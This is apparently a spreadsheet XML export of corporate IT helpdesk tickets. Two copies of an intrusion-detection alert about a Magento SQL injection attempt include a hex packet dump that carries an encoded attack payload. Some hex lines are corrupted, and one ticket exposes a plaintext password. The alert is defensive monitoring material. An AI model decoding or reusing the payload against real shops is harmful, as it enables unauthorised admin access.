    <s v="apac company:  company-ap-chn-apac-shop-closet-2960-access-sw01.company.com  -    fastethernet0/48 Â· uplink to company-ap-chn-apac-2950-24-access-sw05 since 23:31 et on 09/17."/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="job Job_1384 failed in job_scheduler at: 09/18/2016 07:09:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1384 failed in job_scheduler at: 09/18/2016 07:09:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job co_val_update_crosscomp failed in job_scheduler at: 09/18/2016 05:50:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job co_val_update_crosscomp failed in job_scheduler at: 09/18/2016 05:50:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="only erp running slow since last 3-4 hours in Israel.internet is working fine."/>
    <s v="only erp running slow since last 3-4 hours. internet is working fine._x000a_all transactions are running slow._x000a_contact # :_x000a_erp system : SID_34 (all transactions)_x000a__x000a_checked with dac team, no issues as such._x000a_dac team checking with utilization now._x000a__x000a_dac confirmed that utilization is high since last half an hour. _x000a_calling erp basis on call support : on call support _x000a__x000a__x000a_"/>
    <s v="wqfzjycu omleknjd"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job Job_3343 failed in job_scheduler at: 09/18/2016 05:01:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3343 failed in job_scheduler at: 09/18/2016 05:01:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="security incidents - ( sw #in33895560 ) : magento sql injection"/>
    <s v="source ip : 172.20.10.37 , 208.211.136.158_x000a_system name : whqsm010 , reference.company.com (_x000a_user  name: n/a_x000a_location : dmz_x000a_sep , sms status : _x000a_field sales user ( yes / no) :  _x000a_dsw event log: see below_x000a__x000a_**_x000a__x000a_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quot;magento mage_adminhtml_block_widget_grid::getcsvfile() sql injection vulnerability&quot; described in cve-2015-1397._x000a__x000a_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_x000a__x000a_1) autoresolve these alerts directly to the portal (no explicit notification and events will be available for reporting purposes in the portal). this is most likely the best choice if you are not running the application being targeted._x000a_2) ticket only escalation via a medium priority ticket (no phone call) for each unique source ip address for these alerts (this may generate a relatively large volume of incident tickets). _x000a_3) full escalation via a high priority ticket and a phone call for each unique source ip address. _x000a__x000a_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_x000a__x000a_sincerely,_x000a_ ctoc_x000a__x000a__x000a_=========================_x000a_technical details_x000a_=========================_x000a_a vulnerability exists in magento due to insufficient input validation within the mage_adminhtml_block_widget_grid::getcsvfile() function. a remote attacker could exploit this vulnerability to conduct sql injection attacks on vulnerable systems._x000a_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_x000a__x000a_=========================_x000a_references_x000a_=========================_x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_=========================_x000a_event data_x000a_=========================_x000a_related events: _x000a_event id: 44717197_x000a_event summary: 52853 vid68372 possible magento mage_adminhtml_block_widget_gridgetcsvfile() sql injection attempt inbound_x000a_occurrence count: 4_x000a_event count: 4_x000a__x000a_host and connection information_x000a_source ip: 166.78.155.100_x000a_source port: 55334_x000a_source ip geolocation: dallas, usa_x000a_destination ip: 208.211.136.158_x000a_destination port: 80_x000a_destination ip geolocation: usa, usa_x000a_connection directionality: incoming_x000a_protocol: tcp_x000a_http method: post_x000a_host: www.company.de_x000a_full url path: /admin/cms_wysiwyg/directive/index/_x000a__x000a_device information_x000a_device ip: 208.211.136.207_x000a_device name: isensplant_247.company.com_x000a_log time: 2016-09-17 at 11:35:02 utc_x000a_action: not blocked_x000a_vendor eventid: 393369_x000a_cvss score: 6.5 _x000a_vendor priority: 2_x000a_vendor version: 7_x000a__x000a_scwx event processing information_x000a_sherlock rule id (sle): 2161562_x000a_inspector event id: 63726775_x000a_ontology id: 200020003203759378_x000a_event type id: 200020003203707850_x000a_agent id: 102989_x000a__x000a_event detail:_x000a_[**] [1:21163964:2] 52853 vid68372 possible magento mage_adminhtml_block_widget_gridgetcsvfile() sql injection attempt inbound [**]_x000a_[classification: none] [priority: 2] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000a_[sensor id: 602981][event id: 393369][time: 2585223213.930745]_x000a_[src ip: 166.78.155.100][dst ip: 208.211.136.158][sport/itype: 55334][dport/icode: 80][proto: 6]_x000a_09/17/2016-11:35:02.930745 166.78.155.100:55334 -&gt; 208.211.136.158:80_x000a_tcp ttl:54 tos:0x0 id:26997 iplen:20 dgmlen:1236 df_x000a_***ap*** seq: 0x595823f2 ack: 0x6b4edac2 win: 0xe5 tcplen: 32_x000a_tcp options (3) =&gt; nop nop ts: 4341465171 309732804 _x000a_==pcap 1==_x000a__x000a__x000a_[ex http_uri 9: /admin/cms_wysiwyg/directive/index/]_x000a__x000a_[ex http_hostname 10: www.company.de]_x000a__x000a_[o:security]_x000a__x000a_ascii packet(s):_x000a_==pcap 1 ascii s==_x000a_....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_x000a_==pcap 1 ascii e==_x000a__x000a_hex packet(s):_x000a_==pcap 1 hex s==_x000a_000000 0c00 0000 662a dd57 b933 0e00 d404 0000 ....f*.w.3......_x000a_000010 d404 0000 4500 04d4 6975 4000 3606 3b8a ....e...iu@.6.;._x000a_000020 a64e 9b64 d0d3 889e d826 0050 5958 23f2 .n.d.....&amp;.pyx#._x000a_000030 6b4e dac2 8018 00e5 f939 0000 0101 080a kn.......9......_x000a_000040 c08b 4a8c 11cc 9b61 504f 5354 202f 6164 ..j....apost./ad_x000a_000050 6d69 6e2f 436d 735f 5779 7369 7779 672f min/cms_wysiwyg/_x000a_000060 6469 7265 6374 6976 652f 696e 6465 782f directive/index/_x000a_000070 2048 5454 502f 312e 310d 0a48 6f73 743a .http/1.1..host:_x000a_000080 2077 7777 2e6b 656e 6e61 6d65 7461 6c2e .www.company._x000a_000090 6465 0d0a 4163 6365 7074 3a20 2a2f 2a0d de..accept:.*/*._x000a_0000a0 0a43 6f6e 7465 6e74 2d4c 656e 6774 683a .content-length:_x000a_0000b0 2031 3032 320d 0a43 6f6e 7465 6e74 2d54 .1022..content-t_x000a_0000c0 7970 653a 2061 7070 6c69 6361 7469 6f6e ype:.application_x000a_0000d0 2f78 2d77 7777 2d66 6f72 6d2d 7572 6c65 /x-www-form-urle_x000a_0000e0 6e63 6f64 6564 0d0a 0d0a 6669 6c74 6572 ncoded....filter_x000a_0000f0 3d63 4739 7764 5778 6863 6d6c 3065 5674 =cg9wdwxhcml0evt_x000a_000100 6d63 6d39 7458 5430 774a 6e42 7663 4856 mcm9txt0wjnbvchv_x000a_000110 7359 584a 7064 486c 6264 4739 6450 544d syxjpdhlbdg9dptm_x000a_000120 6d63 4739 7764 5778 6863 6d6c 3065 5674 mcg9wdwxhcml0evt_x000a_000130 6SID_26 5756 735a 4639 6c65 4842 7958 5430 mawvszf9lehbyxt0_x000a_000140 774b 5474 5452 5651 6751 464e 4254 4651 wktttrvqgqfnbtfq_x000a_000150 6750 5341 6e63 6e41 6e4f 314e 4656 4342 gpsancnano1nfvcb_x000a_000160 4155 4546 5455 7941 3949 454e 5054 6b4e aueftuya9ienptkn_x000a_000170 4256 4368 4e52 4455 6f51 3039 4f51 3046 bvchnrduoq09oq0f_x000a_000180 554b 4342 4155 3046 4d56 4341 7349 4364 ukcbau0fmvcasicd_x000a_000190 305a 5731 775a 5773 6e4b 5341 704c 4342 0zw1wzwsnkerplcb_x000a_0001a0 4454 3035 4451 5651 6f4a 7a6f 6e4c 4342 dt05dqvqojzonlcb_x000a_0001b0 4155 3046 4d56 4341 704b 5474 5452 5578 au0fmvcapktttrux_x000a_0001c0 4651 3151 6751 4556 5956 464a 4249 446f fq1qgqevyvfjbido_x000a_0001d0 3949 4531 4257 4368 6c65 4852 7959 536b 9ie1bwchlehryysk_x000a_0001e0 6752 6c4a 5054 5342 685a 4731 7062 6c39 grljptsbhzg1pbl9_x000a_0001f0 3163 3256 7949 4664 4952 564a 4649 4756 1c2vyifdirvjfigv_x000a_000200 3464 484a 6849 456c 5449 4535 5056 4342 4dhjhieltie5pvcb_x000a_000210 4f56 5578 4d4f 306c 4f55 3056 5356 4342 ovuxmo0lou0vsvcb_x000a_000220 4a54 6c52 5049 4742 685a 4731 7062 6c39 jtlrpigbhzg1pbl9_x000a_000230 3163 3256 7959 4341 6f59 475a 7063 6e4e 1c2vyycaoygzpcnn_x000a_000240 3062 6d46 745a 5741 7349 4742 7359 584e 0bmftzwasigbsyxn_x000a_000250 3062 6d46 745a 5741 7359 4756 7459 576c 0bmftzwasygvtywl_x000a_000260 7359 4378 6764 584e 6c63 6d35 6862 5756 sycxgdxnlcm5hbwv_x000a_000270 674c 4742 7759 584e 7a64 3239 795a 4741 glgbwyxnzd29yzga_x000a_000280 7359 474e 795a 5746 305a 5752 674c 4742 sygnyzwf0zwrglgb_x000a_000290 7362 3264 7564 5731 674c 4742 795a 5778 sb2dudfrtglgbyzwx_x000a_0002a0 7659 5752 6659 574e 7358 325a 7359 5764 vywrfywnsx2zsywd_x000a_0002b0 674c 4742 7063 3139 6859 3352 7064 6d56 glgbpc19hy3rpdmv_x000a_0002c0 674c 4742 6c65 4852 7959 5741 7359 484a glgblehryywasyhj_x000a_0002d0 7758 3352 7661 3256 7559 4378 6763 6e42 wx3rva2vuycxgcnb_x000a_0002e0 6664 4739 725a 5735 6659 334a 6c59 5852 fdg9rzw5fy3jlyxr_x000a_0002f0 6c5a 4639 6864 4741 7049 465a 4254 4656 lzf9hdgapifzbtfv_x000a_000300 4655 7941 6f4a 305a 7063 6e4e 3062 6d46 fuyaoj0zpcnn0bmf_x000a_000310 745a 5363 734a 3078 6863 3352 7559 5731 tzscsj0xhc3ruyw1_x000a_000320 6c4a 7977 6e63 3256 6a64 584a 7064 486c ljywnc2vjdxjpdhl_x000a_000330 4162 5746 6e5a 5735 3062 324e 7662 5731 abwfnzw50b2nvbw1_x000a_000340 6c63 6d4e 6c4c 6d4e 7662 5363 734a 3342 lcmnllmnvbscsj3b_x000a_000350 7662 476c 6a65 5363 7351 4642 4255 314d vbgljescsqfbbu1m_x000a_000360 7354 6b39 584b 436b 734d 4377 774c 4445 stk9xkcksmcwwlde_x000a_000370 7351 4556 5956 464a 424c 4535 5654 4577 sqevyvfjble5vtew_x000a_000380 7349 4535 5056 7967 704b 5474 4a54 6c4e sie5pvygpkttjtln_x000a_000390 4655 6c51 6753 5535 5554 7942 6759 5752 fulqgsu5utybgywr_x000a_0003a0 7461 5735 6663 6d39 735a 5741 674b 4842 taw5fcm9szwagkhb_x000a_0003b0 6863 6d56 7564 4639 705a 4378 3063 6d56 hcmvudf9pzcx0cmv_x000a_0003c0 6c58 3278 6c64 6d56 734c 484e 7663 6e52 lx2xldmvslhnvcnr_x000a_0003d0 6662 334a 6b5a 5849 7363 6d39 735a 5639 fb3jkzxisupply_chain9szv9_x000a_0003e0 3065 5842 6c4c 4856 7a5a 584a 6661 5751 0exbllhvzzxjfawq_x000a_0003f0 7363 6d39 735a 5639 7559 5731 6c4b 5342 supply_chain9szv9uyw1lksb_x000a_000400 5751 5578 5652 564d 674b 4445 734d 6977 wquxvrvmgkdesmiw_x000a_000410 774c 4364 564a 7977 6f55 3056 4d52 554e wlcdvjywou0vmrun_x000a_000420 5549 4856 7a5a 584a 6661 5751 6752 6c4a uihvzzxjfawqgrlj_x000a_000430 5054 5342 685a 4731 7062 6c39 3163 3256 ptsbhzg1pbl91c2v_x000a_000440 7949 4664 4952 564a 4649 4856 7a5a 584a yifdirvjfihvzzxj_x000a_000450 7559 5731 6c49 4430 674a 3342 7662 476c uyw1lid0gj3bvbgl_x000a_000460 6a65 5363 704c 4364 4761 584a 7a64 4735 jescplcdgaxjzdg5_x000a_000470 6862 5755 6e4b 5473 3d26 5f5f 5f64 6972 hbwunkts=&amp;___dir_x000a_000480 6563 7469 7665 3d65 3374 6962 4739 6a61 ective=e3tibg9ja_x000a_000490 7942 3065 5842 6c50 5546 6b62 576c 7561 yb0exblpufkbwlua_x000a_0004a0 4852 7462 4339 795a 5842 7663 6e52 6663 hrtbc9yzxbvcnrfc_x000a_0004b0 3256 6863 6d4e 6f58 3264 7961 5751 6762 2vhcmnox2dyawqgb_x000a_0004c0 3356 3063 4856 3050 5764 6c64 454e 7a64 3v0chv0pwdldenzd_x000a_0004d0 6b5a 7062 4756 3966 513d 3d26 666f 7277 kzpbgv9fq==&amp;forw_x000a_0004e0 6172 6465 643d 3126 arded=1&amp;_x000a_==pcap 1 hex e==_x000a_[[3 of 4 events not shown due to space constraints]]_x000a_take action_x000a__x000a_ticket action:"/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="38"/>
  </r>
  <r>
    <s v="can not post dn#9169336870 under rma#6001502124"/>
    <s v="_x000a__x000a_received from: wktesmbp.lorjymef@gmail.com_x000a__x000a_dear team,_x000a_pls. help to check below issue~_x000a_return dn#9169336870 can not be posted due to bath issue,but we can not key in anything in batch blank._x000a_pls. help to handle it,thx a lot!_x000a_[cid:image001.png@01SID_351bc.f1978a90]_x000a_[cid:image002.jpg@01SID_351bc.f1978a90]_x000a_b.rgds_x000a_judthtihty.zhuyhts_x000a_company hardpoint apac-wgq dc_x000a__x000a_"/>
    <s v="wktesmbp lorjymef"/>
    <x v="17"/>
  </r>
  <r>
    <s v="security incidents - ( sw #in33895560 ) : magento sql injection"/>
    <s v="source ip : 172.20.10.37 , 208.211.136.158_x000a_system name : whqsm010 , reference.company.com (_x000a_user  name: n/a_x000a_location : dmz_x000a_sep , sms status : _x000a_field sales user ( yes / no) :  _x000a_dsw event log: see below_x000a__x000a_**_x000a__x000a_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quot;magento mage_adminhtml_block_widget_grid::getcsvfile() sql injection vulnerability&quot; described in cve-2015-1397._x000a__x000a_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_x000a__x000a_1) autoresolve these alerts directly to the portal (no explicit notification and events will be available for reporting purposes in the portal). this is most likely the best choice if you are not running the application being targeted._x000a_2) ticket only escalation via a medium priority ticket (no phone call) for each unique source ip address for these alerts (this may generate a relatively large volume of incident tickets). _x000a_3) full escalation via a high priority ticket and a phone call for each unique source ip address. _x000a__x000a_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_x000a__x000a_sincerely,_x000a_ ctoc_x000a__x000a__x000a_=========================_x000a_technical details_x000a_=========================_x000a_a vulnerability exists in magento due to insufficient input validation within the mage_adminhtml_block_widget_grid::getcsvfile() function. a remote attacker could exploit this vulnerability to conduct sql injection attacks on vulnerable systems._x000a_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_x000a__x000a_=========================_x000a_references_x000a_=========================_x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_=========================_x000a_event data_x000a_=========================_x000a_related events: _x000a_event id: 44717197_x000a_event summary: 52853 vid68372 possible magento mage_adminhtml_block_widget_gridgetcsvfile() sql injection attempt inbound_x000a_occurrence count: 4_x000a_event count: 4_x000a__x000a_host and connection information_x000a_source ip: 166.78.155.100_x000a_source port: 55334_x000a_source ip geolocation: dallas, usa_x000a_destination ip: 208.211.136.158_x000a_destination port: 80_x000a_destination ip geolocation: usa, usa_x000a_connection directionality: incoming_x000a_protocol: tcp_x000a_http method: post_x000a_host: www.company.de_x000a_full url path: /admin/cms_wysiwyg/directive/index/_x000a__x000a_device information_x000a_device ip: 208.211.136.207_x000a_device name: isensplant_247.company.com_x000a_log time: 2016-09-17 at 11:35:02 utc_x000a_action: not blocked_x000a_vendor eventid: 393369_x000a_cvss score: 6.5 _x000a_vendor priority: 2_x000a_vendor version: 7_x000a__x000a_scwx event processing information_x000a_sherlock rule id (sle): 2161562_x000a_inspector event id: 63726775_x000a_ontology id: 200020003203759378_x000a_event type id: 200020003203707850_x000a_agent id: 102989_x000a__x000a_event detail:_x000a_[**] [1:21163964:2] 52853 vid68372 possible magento mage_adminhtml_block_widget_gridgetcsvfile() sql injection attempt inbound [**]_x000a_[classification: none] [priority: 2] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000a_[sensor id: 602981][event id: 393369][time: 2585223213.930745]_x000a_[src ip: 166.78.155.100][dst ip: 208.211.136.158][sport/itype: 55334][dport/icode: 80][proto: 6]_x000a_09/17/2016-11:35:02.930745 166.78.155.100:55334 -&gt; 208.211.136.158:80_x000a_tcp ttl:54 tos:0x0 id:26997 iplen:20 dgmlen:1236 df_x000a_***ap*** seq: 0x595823f2 ack: 0x6b4edac2 win: 0xe5 tcplen: 32_x000a_tcp options (3) =&gt; nop nop ts: 4341465171 309732804 _x000a_==pcap 1==_x000a__x000a__x000a_[ex http_uri 9: /admin/cms_wysiwyg/directive/index/]_x000a__x000a_[ex http_hostname 10: www.company.de]_x000a__x000a_[o:security]_x000a__x000a_ascii packet(s):_x000a_==pcap 1 ascii s==_x000a_....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_x000a_==pcap 1 ascii e==_x000a__x000a_hex packet(s):_x000a_==pcap 1 hex s==_x000a_000000 0c00 0000 662a dd57 b933 0e00 d404 0000 ....f*.w.3......_x000a_000010 d404 0000 4500 04d4 6975 4000 3606 3b8a ....e...iu@.6.;._x000a_000020 a64e 9b64 d0d3 889e d826 0050 5958 23f2 .n.d.....&amp;.pyx#._x000a_000030 6b4e dac2 8018 00e5 f939 0000 0101 080a kn.......9......_x000a_000040 c08b 4a8c 11cc 9b61 504f 5354 202f 6164 ..j....apost./ad_x000a_000050 6d69 6e2f 436d 735f 5779 7369 7779 672f min/cms_wysiwyg/_x000a_000060 6469 7265 6374 6976 652f 696e 6465 782f directive/index/_x000a_000070 2048 5454 502f 312e 310d 0a48 6f73 743a .http/1.1..host:_x000a_000080 2077 7777 2e6b 656e 6e61 6d65 7461 6c2e .www.company._x000a_000090 6465 0d0a 4163 6365 7074 3a20 2a2f 2a0d de..accept:.*/*._x000a_0000a0 0a43 6f6e 7465 6e74 2d4c 656e 6774 683a .content-length:_x000a_0000b0 2031 3032 320d 0a43 6f6e 7465 6e74 2d54 .1022..content-t_x000a_0000c0 7970 653a 2061 7070 6c69 6361 7469 6f6e ype:.application_x000a_0000d0 2f78 2d77 7777 2d66 6f72 6d2d 7572 6c65 /x-www-form-urle_x000a_0000e0 6e63 6f64 6564 0d0a 0d0a 6669 6c74 6572 ncoded....filter_x000a_0000f0 3d63 4739 7764 5778 6863 6d6c 3065 5674 =cg9wdwxhcml0evt_x000a_000100 6d63 6d39 7458 5430 774a 6e42 7663 4856 mcm9txt0wjnbvchv_x000a_000110 7359 584a 7064 486c 6264 4739 6450 544d syxjpdhlbdg9dptm_x000a_000120 6d63 4739 7764 5778 6863 6d6c 3065 5674 mcg9wdwxhcml0evt_x000a_000130 6SID_26 5756 735a 4639 6c65 4842 7958 5430 mawvszf9lehbyxt0_x000a_000140 774b 5474 5452 5651 6751 464e 4254 4651 wktttrvqgqfnbtfq_x000a_000150 6750 5341 6e63 6e41 6e4f 314e 4656 4342 gpsancnano1nfvcb_x000a_000160 4155 4546 5455 7941 3949 454e 5054 6b4e aueftuya9ienptkn_x000a_000170 4256 4368 4e52 4455 6f51 3039 4f51 3046 bvchnrduoq09oq0f_x000a_000180 554b 4342 4155 3046 4d56 4341 7349 4364 ukcbau0fmvcasicd_x000a_000190 305a 5731 775a 5773 6e4b 5341 704c 4342 0zw1wzwsnkerplcb_x000a_0001a0 4454 3035 4451 5651 6f4a 7a6f 6e4c 4342 dt05dqvqojzonlcb_x000a_0001b0 4155 3046 4d56 4341 704b 5474 5452 5578 au0fmvcapktttrux_x000a_0001c0 4651 3151 6751 4556 5956 464a 4249 446f fq1qgqevyvfjbido_x000a_0001d0 3949 4531 4257 4368 6c65 4852 7959 536b 9ie1bwchlehryysk_x000a_0001e0 6752 6c4a 5054 5342 685a 4731 7062 6c39 grljptsbhzg1pbl9_x000a_0001f0 3163 3256 7949 4664 4952 564a 4649 4756 1c2vyifdirvjfigv_x000a_000200 3464 484a 6849 456c 5449 4535 5056 4342 4dhjhieltie5pvcb_x000a_000210 4f56 5578 4d4f 306c 4f55 3056 5356 4342 ovuxmo0lou0vsvcb_x000a_000220 4a54 6c52 5049 4742 685a 4731 7062 6c39 jtlrpigbhzg1pbl9_x000a_000230 3163 3256 7959 4341 6f59 475a 7063 6e4e 1c2vyycaoygzpcnn_x000a_000240 3062 6d46 745a 5741 7349 4742 7359 584e 0bmftzwasigbsyxn_x000a_000250 3062 6d46 745a 5741 7359 4756 7459 576c 0bmftzwasygvtywl_x000a_000260 7359 4378 6764 584e 6c63 6d35 6862 5756 sycxgdxnlcm5hbwv_x000a_000270 674c 4742 7759 584e 7a64 3239 795a 4741 glgbwyxnzd29yzga_x000a_000280 7359 474e 795a 5746 305a 5752 674c 4742 sygnyzwf0zwrglgb_x000a_000290 7362 3264 7564 5731 674c 4742 795a 5778 sb2dudfrtglgbyzwx_x000a_0002a0 7659 5752 6659 574e 7358 325a 7359 5764 vywrfywnsx2zsywd_x000a_0002b0 674c 4742 7063 3139 6859 3352 7064 6d56 glgbpc19hy3rpdmv_x000a_0002c0 674c 4742 6c65 4852 7959 5741 7359 484a glgblehryywasyhj_x000a_0002d0 7758 3352 7661 3256 7559 4378 6763 6e42 wx3rva2vuycxgcnb_x000a_0002e0 6664 4739 725a 5735 6659 334a 6c59 5852 fdg9rzw5fy3jlyxr_x000a_0002f0 6c5a 4639 6864 4741 7049 465a 4254 4656 lzf9hdgapifzbtfv_x000a_000300 4655 7941 6f4a 305a 7063 6e4e 3062 6d46 fuyaoj0zpcnn0bmf_x000a_000310 745a 5363 734a 3078 6863 3352 7559 5731 tzscsj0xhc3ruyw1_x000a_000320 6c4a 7977 6e63 3256 6a64 584a 7064 486c ljywnc2vjdxjpdhl_x000a_000330 4162 5746 6e5a 5735 3062 324e 7662 5731 abwfnzw50b2nvbw1_x000a_000340 6c63 6d4e 6c4c 6d4e 7662 5363 734a 3342 lcmnllmnvbscsj3b_x000a_000350 7662 476c 6a65 5363 7351 4642 4255 314d vbgljescsqfbbu1m_x000a_000360 7354 6b39 584b 436b 734d 4377 774c 4445 stk9xkcksmcwwlde_x000a_000370 7351 4556 5956 464a 424c 4535 5654 4577 sqevyvfjble5vtew_x000a_000380 7349 4535 5056 7967 704b 5474 4a54 6c4e sie5pvygpkttjtln_x000a_000390 4655 6c51 6753 5535 5554 7942 6759 5752 fulqgsu5utybgywr_x000a_0003a0 7461 5735 6663 6d39 735a 5741 674b 4842 taw5fcm9szwagkhb_x000a_0003b0 6863 6d56 7564 4639 705a 4378 3063 6d56 hcmvudf9pzcx0cmv_x000a_0003c0 6c58 3278 6c64 6d56 734c 484e 7663 6e52 lx2xldmvslhnvcnr_x000a_0003d0 6662 334a 6b5a 5849 7363 6d39 735a 5639 fb3jkzxisupply_chain9szv9_x000a_0003e0 3065 5842 6c4c 4856 7a5a 584a 6661 5751 0exbllhvzzxjfawq_x000a_0003f0 7363 6d39 735a 5639 7559 5731 6c4b 5342 supply_chain9szv9uyw1lksb_x000a_000400 5751 5578 5652 564d 674b 4445 734d 6977 wquxvrvmgkdesmiw_x000a_000410 774c 4364 564a 7977 6f55 3056 4d52 554e wlcdvjywou0vmrun_x000a_000420 5549 4856 7a5a 584a 6661 5751 6752 6c4a uihvzzxjfawqgrlj_x000a_000430 5054 5342 685a 4731 7062 6c39 3163 3256 ptsbhzg1pbl91c2v_x000a_000440 7949 4664 4952 564a 4649 4856 7a5a 584a yifdirvjfihvzzxj_x000a_000450 7559 5731 6c49 4430 674a 3342 7662 476c uyw1lid0gj3bvbgl_x000a_000460 6a65 5363 704c 4364 4761 584a 7a64 4735 jescplcdgaxjzdg5_x000a_000470 6862 5755 6e4b 5473 3d26 5f5f 5f64 6972 hbwunkts=&amp;___dir_x000a_000480 6563 7469 7665 3d65 3374 6962 4739 6a61 ective=e3tibg9ja_x000a_000490 7942 3065 5842 6c50 5546 6b62 576c 7561 yb0exblpufkbwlua_x000a_0004a0 4852 7462 4339 795a 5842 7663 6e52 6663 hrtbc9yzxbvcnrfc_x000a_0004b0 3256 6863 6d4e 6f58 3264 7961 5751 6762 2vhcmnox2dyawqgb_x000a_0004c0 3356 3063 4856 3050 5764 6c64 454e 7a64 3v0chv0pwdldenzd_x000a_0004d0 6b5a 7062 4756 3966 513d 3d26 666f 7277 kzpbgv9fq==&amp;forw_x000a_0004e0 6172 6465 643d 3126 arded=1&amp;_x000a_==pcap 1 hex e==_x000a_[[3 of 4 events not shown due to space constraints]]_x000a_take action_x000a__x000a_ticket action:"/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="çƒ­åŽ‹ç‚‰4å·plcæŽ§åˆ¶å™¨é€šè®¯æ¨¡å—ç½‘ç»œåœ°å€ä¸¢å¤±"/>
    <s v="ä»Šå¹´å‘ç”Ÿäº†5æ¬¡ç½‘ç»œåœ°å€ä¸¢å¤±ï¼Œéœ€è¦é‡å¯è®¾å¤‡åŽï¼Œæ‰èƒ½é‡æ–°æ¢å¤ï¼Œåœ¨å…¶ä»–è®¾å¤‡ä¸Šæ— æ­¤æ•…éšœã€‚æ˜¯å¦ç»‘å®šipåœ°å€ï¼Ÿ"/>
    <s v="pwfirvgu ydwlhuzi"/>
    <x v="30"/>
  </r>
  <r>
    <s v="reset passwords for hgyvopct dhckfmbq using password_management_tool password reset."/>
    <s v="è¯·å°†å¯†ç è®¾ç½®ä¸ºï¼šsdguo1609"/>
    <s v="hgyvopct dhckfmbq"/>
    <x v="16"/>
  </r>
  <r>
    <s v="job Job_2883 failed in job_scheduler at: 09/18/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2883 failed in job_scheduler at: 09/18/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job bwdpmbkp failed in job_scheduler at: 09/18/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwdpmbkp failed in job_scheduler at: 09/18/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_2883 failed in job_scheduler at: 09/18/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2883 failed in job_scheduler at: 09/18/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1321 failed in job_scheduler at: 09/17/2016 23:51:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1321 failed in job_scheduler at: 09/17/2016 23:51:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_2883 failed in job_scheduler at: 09/17/2016 23:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2883 failed in job_scheduler at: 09/17/2016 23:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="12"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="awsqjfkm dejmuhlg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ç”µè„‘æ„å¤–è¿›æ°´ï¼Œå¸®åŠ©å¤„ç†ï¼è¯·äº¤å°è´ºï¼Œè°¢è°¢"/>
    <s v="ç”µè„‘æ„å¤–è¿›æ°´ï¼Œå¸®åŠ©å¤„ç†ï¼è¯·äº¤å°è´ºï¼Œè°¢è°¢"/>
    <s v="pvfclkmn gebyipwr"/>
    <x v="30"/>
  </r>
  <r>
    <s v="job Job_370 failed in job_scheduler at: 09/17/2016 22:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_370 failed in job_scheduler at: 09/17/2016 22:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp logon"/>
    <s v="_x000a__x000a_received from: rujpckto.lhutkpxm@gmail.com_x000a__x000a_help team_x000a__x000a_today is chinese working day. can you open erp system aerp?_x000a__x000a_rujpckto lhutkpxm(æœ±å®)_x000a_materials manager_x000a_company (apac) co., ltd._x000a__x000a_"/>
    <s v="rujpckto lhutkpxm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="alwaysupservice.exe is not running in many plm conversion servers"/>
    <s v="HostName_107; HostName_108; HostName_521; HostName_520; HostName_986 : alwaysupservice.exe is not running"/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job Job_567 failed in job_scheduler at: 09/17/2016 20:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_567 failed in job_scheduler at: 09/17/2016 20:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1391 failed in job_scheduler at: 09/17/2016 18:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1391 failed in job_scheduler at: 09/17/2016 18:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1665 failed in job_scheduler at: 09/17/2016 18:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1665 failed in job_scheduler at: 09/17/2016 18:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1336 failed in job_scheduler at: 09/17/2016 17:43:00  "/>
